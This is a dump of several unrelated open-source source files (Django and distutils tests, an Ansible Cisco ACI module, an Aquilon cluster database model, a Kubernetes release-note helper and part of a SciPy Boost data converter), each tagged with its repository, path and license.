event = await req._recv_event(h11_connection)
assert event is h11.PAUSED
assert h11_connection.data == b""
| mit |
quxiaolong1504/django | tests/builtin_server/tests.py | 368 | 5230 | from __future__ import unicode_literals
import sys
import traceback
from io import BytesIO
from unittest import TestCase
from wsgiref import simple_server
# If data is too large, socket will choke, so write chunks no larger than 32MB
# at a time. The rationale behind the 32MB can be found on Django's Trac:
# https://code.djangoproject.com/ticket/5596#comment:4
MAX_SOCKET_CHUNK_SIZE = 32 * 1024 * 1024 # 32 MB
class ServerHandler(simple_server.ServerHandler, object):
error_status = str("500 INTERNAL SERVER ERROR")
def write(self, data):
"""'write()' callable as specified by PEP 3333"""
assert isinstance(data, bytes), "write() argument must be bytestring"
if not self.status:
raise AssertionError("write() before start_response()")
elif not self.headers_sent:
# Before the first output, send the stored headers
self.bytes_sent = len(data) # make sure we know content-length
self.send_headers()
else:
self.bytes_sent += len(data)
# XXX check Content-Length and truncate if too many bytes written?
data = BytesIO(data)
for chunk in iter(lambda: data.read(MAX_SOCKET_CHUNK_SIZE), b''):
self._write(chunk)
self._flush()
def error_output(self, environ, start_response):
super(ServerHandler, self).error_output(environ, start_response)
return ['\n'.join(traceback.format_exception(*sys.exc_info()))]
# Backport of http://hg.python.org/cpython/rev/d5af1b235dab. See #16241.
# This can be removed when support for Python <= 2.7.3 is deprecated.
def finish_response(self):
try:
if not self.result_is_file() or not self.sendfile():
for data in self.result:
self.write(data)
self.finish_content()
finally:
self.close()
class DummyHandler(object):
def log_request(self, *args, **kwargs):
pass
class FileWrapperHandler(ServerHandler):
def __init__(self, *args, **kwargs):
super(FileWrapperHandler, self).__init__(*args, **kwargs)
self.request_handler = DummyHandler()
self._used_sendfile = False
def sendfile(self):
self._used_sendfile = True
return True
def wsgi_app(environ, start_response):
start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
return [b'Hello World!']
def wsgi_app_file_wrapper(environ, start_response):
start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
return environ['wsgi.file_wrapper'](BytesIO(b'foo'))
class WSGIFileWrapperTests(TestCase):
"""
Test that the wsgi.file_wrapper works for the builting server.
Tests for #9659: wsgi.file_wrapper in the builtin server.
We need to mock a couple of handlers and keep track of what
gets called when using a couple kinds of WSGI apps.
"""
def test_file_wrapper_uses_sendfile(self):
env = {'SERVER_PROTOCOL': 'HTTP/1.0'}
handler = FileWrapperHandler(None, BytesIO(), BytesIO(), env)
handler.run(wsgi_app_file_wrapper)
self.assertTrue(handler._used_sendfile)
self.assertEqual(handler.stdout.getvalue(), b'')
self.assertEqual(handler.stderr.getvalue(), b'')
def test_file_wrapper_no_sendfile(self):
env = {'SERVER_PROTOCOL': 'HTTP/1.0'}
handler = FileWrapperHandler(None, BytesIO(), BytesIO(), env)
handler.run(wsgi_app)
self.assertFalse(handler._used_sendfile)
self.assertEqual(handler.stdout.getvalue().splitlines()[-1], b'Hello World!')
self.assertEqual(handler.stderr.getvalue(), b'')
class WriteChunkCounterHandler(ServerHandler):
"""
Server handler that counts the number of chunks written after headers were
sent. Used to make sure large response body chunking works properly.
"""
def __init__(self, *args, **kwargs):
super(WriteChunkCounterHandler, self).__init__(*args, **kwargs)
self.request_handler = DummyHandler()
self.headers_written = False
self.write_chunk_counter = 0
def send_headers(self):
super(WriteChunkCounterHandler, self).send_headers()
self.headers_written = True
def _write(self, data):
if self.headers_written:
self.write_chunk_counter += 1
self.stdout.write(data)
def send_big_data_app(environ, start_response):
start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
# Return a blob of data that is 1.5 times the maximum chunk size.
return [b'x' * (MAX_SOCKET_CHUNK_SIZE + MAX_SOCKET_CHUNK_SIZE // 2)]
class ServerHandlerChunksProperly(TestCase):
"""
Test that the ServerHandler chunks data properly.
Tests for #18972: The logic that performs the math to break data into
32MB (MAX_SOCKET_CHUNK_SIZE) chunks was flawed, BUT it didn't actually
cause any problems.
"""
def test_chunked_data(self):
env = {'SERVER_PROTOCOL': 'HTTP/1.0'}
handler = WriteChunkCounterHandler(None, BytesIO(), BytesIO(), env)
handler.run(send_big_data_app)
self.assertEqual(handler.write_chunk_counter, 2)
| bsd-3-clause |
roadmapper/ansible | lib/ansible/modules/network/aci/aci_maintenance_group_node.py | 5 | 6223 | #!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: aci_maintenance_group_node
short_description: Manage maintenance group nodes
version_added: '2.8'
description:
- Manage maintenance group nodes
options:
group:
description:
- The maintenance group name that you want to add the node to.
type: str
required: true
node:
description:
- The node to be added to the maintenance group.
- The value equals the nodeid.
type: str
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
name_alias:
version_added: '2.10'
description:
- The alias for the current object. This relates to the nameAlias field in ACI.
type: str
extends_documentation_fragment:
- aci
author:
- Steven Gerhart (@sgerhart)
'''
EXAMPLES = r'''
- name: maintenance group
aci_maintenance_group_node:
host: "{{ inventory_hostname }}"
username: "{{ user }}"
password: "{{ pass }}"
validate_certs: no
group: maintenancegrp1
node: 1001
state: present
- name: maintenance group
aci_maintenance_group_node:
host: "{{ inventory_hostname }}"
username: "{{ user }}"
password: "{{ pass }}"
validate_certs: no
group: maintenancegrp1
node: 1002
state: absent
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: str
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: str
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: str
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: str
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: str
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
group=dict(type='str'), # Not required for querying all objects
node=dict(type='str'),
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
name_alias=dict(type='str'),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['node', 'group']],
['state', 'present', ['node', 'group']],
],
)
state = module.params.get('state')
group = module.params.get('group')
node = module.params.get('node')
name_alias = module.params.get('name_alias')
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='maintMaintGrp',
aci_rn='fabric/maintgrp-{0}'.format(group),
target_filter={'name': group},
module_object=group,
),
subclass_1=dict(
aci_class='fabricNodeBlk',
aci_rn='nodeblk-blk{0}-{0}'.format(node),
target_filter={'name': 'blk{0}-{0}'.format(node)},
module_object=node,
),
)
aci.get_existing()
if state == 'present':
aci.payload(
aci_class='fabricNodeBlk',
class_config=dict(
from_=node,
to_=node,
nameAlias=name_alias,
),
)
aci.get_diff(aci_class='fabricNodeBlk')
aci.post_config()
elif state == 'absent':
aci.delete_config()
aci.exit_json()
if __name__ == "__main__":
main()
| gpl-3.0 |
jrha/aquilon | lib/python2.6/aquilon/aqdb/model/cluster.py | 2 | 25571 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2009,2010,2011,2012,2013 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" tables/classes applying to clusters """
import re
from datetime import datetime
from sqlalchemy import (Column, Integer, Boolean, String, DateTime, Sequence,
ForeignKey, UniqueConstraint, PrimaryKeyConstraint,
Index)
from sqlalchemy.orm import (object_session, relation, backref, deferred,
joinedload)
from sqlalchemy.orm.attributes import set_committed_value
from sqlalchemy.ext.associationproxy import association_proxy
from aquilon.exceptions_ import ArgumentError
from aquilon.aqdb.column_types import AqStr
from aquilon.aqdb.model import (Base, Host, Location, Personality,
ClusterLifecycle, ServiceInstance, Branch,
Switch, UserPrincipal)
# List of functions allowed to be used in vmhost_capacity_function
restricted_builtins = {'None': None,
'dict': dict,
'divmod': divmod,
'float': float,
'int': int,
'len': len,
'long': long,
'max': max,
'min': min,
'pow': pow,
'round': round}
def convert_resources(resources):
""" Convert a list of dicts to a dict of lists """
# Turn this: [{'a': 1, 'b': 1},
# {'a': 2, 'b': 2}]
#
# Into this: {'a': [1, 2],
# 'b': [1, 2]}
resmap = {}
for res in resources:
for name, value in res.items():
if name not in resmap:
resmap[name] = []
resmap[name].append(value)
return resmap
# Cluster is a reserved word in Oracle
_TN = 'clstr'
_ETN = 'esx_cluster'
_HCM = 'host_cluster_member'
_CSB = 'cluster_service_binding'
_CSBABV = 'clstr_svc_bndg'
_CAP = 'clstr_allow_per'
def _hcm_host_creator(tuple):
host = tuple[0]
node_index = tuple[1]
return HostClusterMember(host=host, node_index=node_index)
class Cluster(Base):
"""
A group of two or more hosts for high availablility or grid
capabilities. Location constraint is nullable as it may or
may not be used.
"""
__tablename__ = _TN
id = Column(Integer, Sequence('%s_seq' % _TN), primary_key=True)
cluster_type = Column(AqStr(16), nullable=False)
name = Column(AqStr(64), nullable=False)
#Lack of cascaded deletion is intentional on personality
personality_id = Column(Integer, ForeignKey('personality.id',
name='cluster_prsnlty_fk'),
nullable=False)
branch_id = Column(Integer, ForeignKey('branch.id',
name='cluster_branch_fk'),
nullable=False)
sandbox_author_id = Column(Integer,
ForeignKey('user_principal.id',
name='cluster_sandbox_author_fk'),
nullable=True)
location_constraint_id = Column(ForeignKey('location.id',
name='cluster_location_fk'))
#esx cluster __init__ method overrides this default
max_hosts = Column(Integer, nullable=True)
# N+M clusters are defined by setting down_hosts_threshold to M
# Simple 2-node clusters would have down_hosts_threshold of 0
down_hosts_threshold = Column(Integer, nullable=True)
# And that tolerance can be relaxed even further in maintenance windows
down_maint_threshold = Column(Integer, nullable=True)
# Some clusters (e.g. grid) don't want fixed N+M down_hosts_threshold, but
# use percentage goals (i.e. don't alert until 5% of the population dies)
down_hosts_percent = Column(Boolean(name="%s_down_hosts_ck" % _TN),
default=False, nullable=True)
down_maint_percent = Column(Boolean(name="%s_maint_hosts_ck" % _TN),
default=False, nullable=True)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
status_id = Column(Integer, ForeignKey('clusterlifecycle.id',
name='cluster_status_fk'),
nullable=False)
comments = Column(String(255))
status = relation(ClusterLifecycle, innerjoin=True)
location_constraint = relation(Location, lazy=False)
personality = relation(Personality, lazy=False, innerjoin=True)
branch = relation(Branch, lazy=False, innerjoin=True, backref='clusters')
sandbox_author = relation(UserPrincipal)
hosts = association_proxy('_hosts', 'host', creator=_hcm_host_creator)
metacluster = association_proxy('_metacluster', 'metacluster')
__table_args__ = (UniqueConstraint(name, name='cluster_uk'),
Index("cluster_branch_idx", branch_id),
Index("cluster_prsnlty_idx", personality_id),
Index("cluster_location_idx", location_constraint_id))
__mapper_args__ = {'polymorphic_on': cluster_type}
@property
def title(self):
if self.personality.archetype.outputdesc is not None:
return self.personality.archetype.outputdesc
return self.personality.archetype.name.capitalize() + " Cluster"
@property
def dht_value(self):
if not self.down_hosts_percent:
return self.down_hosts_threshold
return int((self.down_hosts_threshold * len(self.hosts)) / 100)
@property
def dmt_value(self):
if not self.down_maint_percent:
return self.down_maint_threshold
return int((self.down_maint_threshold * len(self.hosts)) / 100)
@staticmethod
def parse_threshold(threshold):
is_percent = False
percent = re.search('(\d+)(%)?', threshold)
thresh_value = int(percent.group(1))
if percent.group(2):
is_percent = True
return (is_percent, thresh_value)
@property
def authored_branch(self):
if self.sandbox_author:
return "%s/%s" % (self.sandbox_author.name, self.branch.name)
return str(self.branch.name)
@property
def personality_info(self):
if self.cluster_type in self.personality.cluster_infos:
return self.personality.cluster_infos[self.cluster_type]
else:
return None
@property
def required_services(self):
return self.personality.services + self.personality.archetype.services
@property
def machines(self):
mach = []
if self.resholder:
for res in self.resholder.resources:
# TODO: support virtual machines inside resource groups?
if res.resource_type == "virtual_machine":
mach.append(res.machine)
return mach
def validate_membership(self, host, error=ArgumentError, **kwargs):
if host.machine.location != self.location_constraint and \
self.location_constraint not in \
host.machine.location.parents:
raise error("Host location {0} is not within cluster "
"location {1}.".format(host.machine.location,
self.location_constraint))
if host.branch != self.branch or \
host.sandbox_author != self.sandbox_author:
raise ArgumentError("{0} {1} {2} does not match {3:l} {4} "
"{5}.".format(host,
host.branch.branch_type,
host.authored_branch,
self,
self.branch.branch_type,
self.authored_branch))
def validate(self, max_hosts=None, error=ArgumentError, **kwargs):
session = object_session(self)
q = session.query(HostClusterMember)
q = q.filter_by(cluster=self)
q = q.options(joinedload('host'),
joinedload('host.machine'))
members = q.all()
set_committed_value(self, '_hosts', members)
if self.cluster_type != 'meta':
for i in [
"down_hosts_threshold",
"down_hosts_percent",
"down_maint_percent",
"personality_id"
#"branch_id"
]:
if getattr(self, i, None) is None:
raise error("Attribute %s must be set for a %s cluster." %
(i, self.cluster_type))
else:
if self.metacluster:
raise error("Metaclusters can't contain other metaclusters.")
if max_hosts is None:
max_hosts = self.max_hosts
if len(self.hosts) > self.max_hosts:
raise error("{0} is over capacity of {1} hosts.".format(self,
max_hosts))
if self.metacluster:
self.metacluster.validate()
def format_helper(self, format_spec, instance):
# Based on format_helper() and _get_class_label() in Base
lowercase = False
class_only = False
passthrough = ""
for letter in format_spec:
if letter == "l":
lowercase = True
elif letter == "c":
class_only = True
else:
passthrough += letter
if self.cluster_type == 'meta':
clsname = self.title + " Metacluster"
else:
clsname = self.title + " Cluster"
if lowercase:
parts = clsname.split()
clsname = ' '.join(map(
lambda x: x if x[:-1].isupper() else x.lower(), parts))
if class_only:
return clsname.__format__(passthrough)
val = "%s %s" % (clsname, instance)
return val.__format__(passthrough)
cluster = Cluster.__table__ # pylint: disable=C0103
cluster.info['unique_fields'] = ['name']
class ComputeCluster(Cluster):
"""
A cluster containing computers - no special characteristics
"""
__tablename__ = 'compute_cluster'
__mapper_args__ = {'polymorphic_identity': 'compute'}
_class_label = 'Compute Cluster'
id = Column(Integer, ForeignKey('%s.id' % _TN,
name='compute_cluster_fk',
ondelete='CASCADE'),
primary_key=True)
compute_cluster = ComputeCluster.__table__ # pylint: disable=C0103
compute_cluster.info['unique_fields'] = ['name']
class StorageCluster(Cluster):
"""
A cluster of storage devices
"""
__tablename__ = 'storage_cluster'
__mapper_args__ = {'polymorphic_identity': 'storage'}
_class_label = 'Storage Cluster'
id = Column(Integer, ForeignKey('%s.id' % _TN,
name='storage_cluster_fk',
ondelete='CASCADE'),
primary_key=True)
def validate_membership(self, host, error=ArgumentError, **kwargs):
super(StorageCluster, self).validate_membership(host=host, error=error,
**kwargs)
if host.archetype.name != "filer":
raise error("only hosts with archetype 'filer' can be added "
"to a storage cluster. The host %s is of archetype %s"
% (host.fqdn, host.archetype))
storage_cluster = StorageCluster.__table__ # pylint: disable=C0103
storage_cluster.info['unique_fields'] = ['name']
# ESX Cluster is really a Grid Cluster, but we have
# specific broker-level behaviours we need to enforce
class EsxCluster(Cluster):
"""
Specifically for our VMware esx based clusters.
"""
__tablename__ = _ETN
_class_label = 'ESX Cluster'
esx_cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
name='%s_cluster_fk' % _ETN,
ondelete='CASCADE'),
#if the cluster record is deleted so is esx_cluster
primary_key=True)
vm_count = Column(Integer, default=16, nullable=True)
host_count = Column(Integer, default=1, nullable=False)
# Memory capacity override
memory_capacity = Column(Integer, nullable=True)
switch_id = Column(Integer,
ForeignKey('switch.hardware_entity_id',
name='%s_switch_fk' % _ETN),
nullable=True)
switch = relation(Switch, lazy=False,
backref=backref('esx_clusters'))
__table_args__ = (Index("%s_switch_idx" % _ETN, switch_id),)
__mapper_args__ = {'polymorphic_identity': 'esx'}
@property
def vm_to_host_ratio(self):
return '%s:%s' % (self.vm_count, self.host_count)
@property
def max_vm_count(self):
if self.host_count == 0:
return 0
effective_vmhost_count = len(self.hosts) - self.down_hosts_threshold
if effective_vmhost_count < 0:
return 0
return effective_vmhost_count * self.vm_count / self.host_count
@property
def minimum_location(self):
location = None
for host in self.hosts:
if location:
location = location.merge(host.machine.location)
else:
location = host.machine.location
return location
@property
def vmhost_capacity_function(self):
""" Return the compiled VM host capacity function """
info = self.personality_info
if info:
return info.compiled_vmhost_capacity_function
else:
return None
@property
def virtmachine_capacity_function(self):
""" Return the compiled virtual machine capacity function """
# Only identity mapping for now
return None
def get_total_capacity(self, down_hosts_threshold=None):
""" Return the total capacity available for use by virtual machines """
if down_hosts_threshold is None:
down_hosts_threshold = self.down_hosts_threshold
if len(self.hosts) <= down_hosts_threshold:
if self.memory_capacity is not None:
return {'memory': self.memory_capacity}
return {'memory': 0}
func = self.vmhost_capacity_function
if self.personality_info:
overcommit = self.personality_info.vmhost_overcommit_memory
else:
overcommit = 1
# No access for anything except built-in functions
global_vars = {'__builtins__': restricted_builtins}
resources = []
for host in self.hosts:
# This is the list of variables we want to pass to the capacity
# function
local_vars = {'memory': host.machine.memory}
if func:
rec = eval(func, global_vars, local_vars)
else:
rec = local_vars
# Apply the memory overcommit factor. Force the result to be
# an integer since it looks better on display
if 'memory' in rec:
rec['memory'] = int(rec['memory'] * overcommit)
resources.append(rec)
# Convert the list of dicts to a dict of lists
resmap = convert_resources(resources)
# Drop the <down_hosts_threshold> largest elements from every list, and
# sum the rest
for name in resmap:
reslist = sorted(resmap[name])
if down_hosts_threshold > 0:
reslist = reslist[:-down_hosts_threshold]
resmap[name] = sum(reslist)
# Process overrides
if self.memory_capacity is not None:
resmap['memory'] = self.memory_capacity
return resmap
def get_capacity_overrides(self):
"""Used by the raw formatter to flag a capacity as overridden."""
return {'memory': self.memory_capacity}
def get_total_usage(self):
""" Return the amount of resources used by the virtual machines """
func = self.virtmachine_capacity_function
# No access for anything except built-in functions
global_vars = {'__builtins__': restricted_builtins}
resmap = {}
for machine in self.machines:
# This is the list of variables we want to pass to the capacity
# function
local_vars = {'memory': machine.memory}
if func:
res = eval(func, global_vars, local_vars)
else:
res = local_vars
for name, value in res.items():
if name not in resmap:
resmap[name] = value
else:
resmap[name] += value
return resmap
def validate(self, vm_part=None, host_part=None, current_vm_count=None,
current_host_count=None, down_hosts_threshold=None,
down_hosts_percent=None,
error=ArgumentError, **kwargs):
super(EsxCluster, self).validate(error=error, **kwargs)
# Preload resources
resource_by_id = {}
if self.resholder:
from aquilon.aqdb.model import VirtualMachine, ClusterResource
session = object_session(self)
q = session.query(VirtualMachine)
q = q.join(ClusterResource)
q = q.filter_by(cluster=self)
q = q.options([joinedload('machine'),
joinedload('machine.primary_name'),
joinedload('machine.primary_name.fqdn')])
for res in q:
resource_by_id[res.id] = res
if vm_part is None:
vm_part = self.vm_count
if host_part is None:
host_part = self.host_count
if current_vm_count is None:
current_vm_count = len(self.machines)
if current_host_count is None:
current_host_count = len(self.hosts)
if down_hosts_threshold is None:
down_hosts_threshold = self.down_hosts_threshold
if down_hosts_percent is None:
down_hosts_percent = self.down_hosts_percent
# It doesn't matter how many vmhosts we have if there are no
# virtual machines.
if current_vm_count <= 0:
return
if host_part == 0:
raise error("Invalid ratio of {0}:{1} for {2:l}.".format(
vm_part, host_part, self))
# For calculations, assume that down_hosts_threshold vmhosts
# are not available from the number currently configured.
if down_hosts_percent:
adjusted_host_count = current_host_count - \
int(down_hosts_threshold * current_host_count / 100)
dhtstr = "%d%%" % down_hosts_threshold
else:
adjusted_host_count = current_host_count - down_hosts_threshold
dhtstr = "%d" % down_hosts_threshold
if adjusted_host_count <= 0:
raise error("%s cannot support VMs with %s "
"vmhosts and a down_hosts_threshold of %s" %
(format(self), current_host_count, dhtstr))
# The current ratio must be less than the requirement...
# cur_vm / cur_host <= vm_part / host_part
# cur_vm * host_part <= vm_part * cur_host
# Apply a logical not to test for the error condition...
if current_vm_count * host_part > vm_part * adjusted_host_count:
raise error("%s VMs:%s hosts in %s violates "
"ratio %s:%s with down_hosts_threshold %s" %
(current_vm_count, current_host_count, format(self),
vm_part, host_part, dhtstr))
capacity = self.get_total_capacity()
usage = self.get_total_usage()
for name, value in usage.items():
# Skip resources that are not restricted
if name not in capacity:
continue
if value > capacity[name]:
raise error("{0} is over capacity regarding {1}: wanted {2}, "
"but the limit is {3}.".format(self, name, value,
capacity[name]))
return
def __init__(self, **kw):
if 'max_hosts' not in kw:
kw['max_hosts'] = 8
super(EsxCluster, self).__init__(**kw)
esx_cluster = EsxCluster.__table__ # pylint: disable=C0103
esx_cluster.info['unique_fields'] = ['name']
class HostClusterMember(Base):
""" Association table for clusters and their member hosts """
__tablename__ = _HCM
cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
name='hst_clstr_mmbr_clstr_fk',
ondelete='CASCADE'),
#if the cluster is deleted, so is membership
nullable=False)
host_id = Column(Integer, ForeignKey('host.machine_id',
name='hst_clstr_mmbr_hst_fk',
ondelete='CASCADE'),
#if the host is deleted, so is the membership
nullable=False)
node_index = Column(Integer, nullable=False)
# Association Proxy and relation cascading: We need cascade=all
# on backrefs so that deletion propagates to avoid AssertionError:
# Dependency rule tried to blank-out primary key column on deletion
# of the Cluster and it's links. On the contrary do not have
# cascade='all' on the forward mapper here, else deletion of
# clusters and their links also causes deleteion of hosts (BAD)
cluster = relation(Cluster, lazy=False, innerjoin=True,
backref=backref('_hosts', cascade='all, delete-orphan'))
# This is a one-to-one relation, so we need uselist=False on the backref
host = relation(Host, lazy=False, innerjoin=True,
backref=backref('_cluster', uselist=False,
cascade='all, delete-orphan'))
__table_args__ = (PrimaryKeyConstraint(cluster_id, host_id,
name="%s_pk" % _HCM),
UniqueConstraint(host_id,
name='host_cluster_member_host_uk'),
UniqueConstraint(cluster_id, node_index,
name='host_cluster_member_node_uk'))
hcm = HostClusterMember.__table__ # pylint: disable=C0103
hcm.info['unique_fields'] = ['cluster', 'host']
Host.cluster = association_proxy('_cluster', 'cluster')
class ClusterAllowedPersonality(Base):
__tablename__ = _CAP
cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
name='clstr_allowed_pers_c_fk',
ondelete='CASCADE'),
nullable=False)
personality_id = Column(Integer, ForeignKey('personality.id',
name='clstr_allowed_pers_p_fk',
ondelete='CASCADE'),
nullable=False)
__table_args__ = (PrimaryKeyConstraint(cluster_id, personality_id),
Index('%s_prsnlty_idx' % _CAP, personality_id))
Cluster.allowed_personalities = relation(Personality,
secondary=ClusterAllowedPersonality.__table__)
class ClusterServiceBinding(Base):
"""
Makes bindings of service instances to clusters
"""
__tablename__ = _CSB
_class_label = 'Cluster Service Binding'
cluster_id = Column(Integer, ForeignKey('%s.id' % _TN,
name='%s_cluster_fk' % _CSBABV,
ondelete='CASCADE'),
nullable=False)
service_instance_id = Column(Integer,
ForeignKey('service_instance.id',
name='%s_srv_inst_fk' % _CSBABV),
nullable=False)
__table_args__ = (PrimaryKeyConstraint(cluster_id, service_instance_id),
Index('%s_si_idx' % _CSBABV, service_instance_id))
Cluster.service_bindings = relation(ServiceInstance,
secondary=ClusterServiceBinding.__table__)
| apache-2.0 |
technologiescollege/Blockly-rduino-communication | scripts_XP/Lib/distutils/tests/test_install_headers.py | 147 | 1264 | """Tests for distutils.command.install_headers."""
import sys
import os
import unittest
import getpass
from distutils.command.install_headers import install_headers
from distutils.tests import support
from test.support import run_unittest
class InstallHeadersTestCase(support.TempdirManager,
support.LoggingSilencer,
support.EnvironGuard,
unittest.TestCase):
def test_simple_run(self):
# we have two headers
header_list = self.mkdtemp()
header1 = os.path.join(header_list, 'header1')
header2 = os.path.join(header_list, 'header2')
self.write_file(header1)
self.write_file(header2)
headers = [header1, header2]
pkg_dir, dist = self.create_dist(headers=headers)
cmd = install_headers(dist)
self.assertEqual(cmd.get_inputs(), headers)
# let's run the command
cmd.install_dir = os.path.join(pkg_dir, 'inst')
cmd.ensure_finalized()
cmd.run()
# let's check the results
self.assertEqual(len(cmd.get_outputs()), 2)
def test_suite():
return unittest.makeSuite(InstallHeadersTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
| gpl-3.0 |
nebril/kubernetes | hack/lookup_pull.py | 246 | 1299 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Script to print out PR info in release note format.
import json
import sys
import urllib2
PULLQUERY=("https://api.github.com/repos/"
"GoogleCloudPlatform/kubernetes/pulls/{pull}")
LOGIN="login"
TITLE="title"
USER="user"
def print_pulls(pulls):
for pull in pulls:
d = json.loads(urllib2.urlopen(PULLQUERY.format(pull=pull)).read())
print "* {title} #{pull} ({author})".format(
title=d[TITLE], pull=pull, author=d[USER][LOGIN])
if __name__ == "__main__":
if len(sys.argv) < 2:
print ("Usage: {cmd} <pulls>...: Prints out short " +
"markdown description for PRs appropriate for release notes.")
sys.exit(1)
print_pulls(sys.argv[1:])
| apache-2.0 |
vberaudi/scipy | scipy/special/utils/convert.py | 77 | 5554 | # This script is used to parse BOOST special function test data into something
# we can easily import in numpy. It is ugly as hell, but it works.
from __future__ import division, print_function, absolute_import
import re
import os
from numpy import arccosh, log1p, expm1, arcsinh, arctanh
from scipy.special import digamma, erfc, expi, erf, expn, gamma, gammaln, iv
# Where to put the data (directory will be created)
DATA_DIR = 'data'
# where to pull out boost data: assume a SVN checkout of boost (here in
# /Users/david/src/dev/boost/trunk)
BOOST_SRC = "boostmath/test"
CXX_COMMENT = re.compile(r'^\s+//')
DATA_REGEX = re.compile(r'^\s+/*\{*\s*SC_')
ITEM_REGEX = re.compile(r'[+-]?\d*\.?\d+(?:[eE][+-]?\d+)?')
HEADER_REGEX = re.compile(
r'const boost::array\<boost::array\<.*, (\d+)\>, (\d+)\> ([a-zA-Z_\d]+)')
# List of boost test data files to parse
DATA_FILES = [
'acosh_data.ipp',
'asinh_data.ipp',
'assoc_legendre_p.ipp',
'atanh_data.ipp',
'bessel_i_data.ipp',
'bessel_i_int_data.ipp',
'bessel_j_data.ipp',
'bessel_j_int_data.ipp',
'bessel_j_large_data.ipp',
'bessel_k_data.ipp',
'bessel_k_int_data.ipp',
'bessel_y01_data.ipp',
'bessel_yn_data.ipp',
'bessel_yv_data.ipp',
'beta_exp_data.ipp',
'beta_med_data.ipp',
'beta_small_data.ipp',
'binomial_data.ipp',
'binomial_large_data.ipp',
'binomial_quantile.ipp',
'cbrt_data.ipp',
'digamma_data.ipp',
'digamma_neg_data.ipp',
'digamma_root_data.ipp',
'digamma_small_data.ipp',
'ellint_e2_data.ipp',
'ellint_e_data.ipp',
'ellint_f_data.ipp',
'ellint_k_data.ipp',
'ellint_pi2_data.ipp',
'ellint_pi3_data.ipp',
'ellint_pi3_large_data.ipp',
'ellint_rc_data.ipp',
'ellint_rd_data.ipp',
'ellint_rf_data.ipp',
'ellint_rj_data.ipp',
'erfc_inv_big_data.ipp',
'erfc_inv_data.ipp',
'erf_data.ipp',
'erf_inv_data.ipp',
'erf_large_data.ipp',
'erf_small_data.ipp',
'expint_1_data.ipp',
'expint_data.ipp',
'expinti_data_double.ipp',
'expinti_data.ipp',
'expinti_data_long.ipp',
'expint_small_data.ipp',
'gamma_inv_big_data.ipp',
'gamma_inv_data.ipp',
'gamma_inv_small_data.ipp',
'hermite.ipp',
'hypergeometric_dist_data2.ipp',
'hypergeometric_test_data.ipp',
'ibeta_data.ipp',
'ibeta_int_data.ipp',
'ibeta_inva_data.ipp',
'ibeta_inv_data.ipp',
'ibeta_large_data.ipp',
'ibeta_small_data.ipp',
'igamma_big_data.ipp',
'igamma_int_data.ipp',
'igamma_inva_data.ipp',
'igamma_med_data.ipp',
'igamma_small_data.ipp',
'laguerre2.ipp',
'laguerre3.ipp',
'legendre_p.ipp',
'legendre_p_large.ipp',
'log1p_expm1_data.ipp',
'ncbeta_big.ipp',
'ncbeta.ipp',
'nccs_big.ipp',
